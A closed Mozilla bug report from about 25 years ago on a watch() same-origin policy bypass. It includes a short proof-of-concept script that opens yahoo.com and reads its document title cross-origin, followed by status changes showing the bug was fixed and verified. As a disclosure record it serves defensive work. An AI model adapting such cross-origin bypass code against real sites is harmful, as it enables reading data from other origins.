Closed Bug 25864 Opened 25 years ago Closed 25 years ago

watch() vulnerability

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

()

Details

(Whiteboard: [PDT+])

The watch() method allows circumventing Same Origin security policy. The code is: ----------------------------------------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com","victim"); function f() { a.document.watch("title",function (id,oldval,newval) {alert('The page title is: '+oldval);}) } setTimeout("f();a.document.title='title';",10000); </SCRIPT> -----------------------------------------------------------------------
Status: NEW → ASSIGNED
Keywords: beta1
Target Milestone: M14
Group: netscapeconfidential?
Fixed; added a new callback from the generated DOM code.
Group: netscapeconfidential?
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Putting on PDT+ radar for beta1.
Whiteboard: [PDT+]
Verified fixed.
Status: RESOLVED → VERIFIED
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.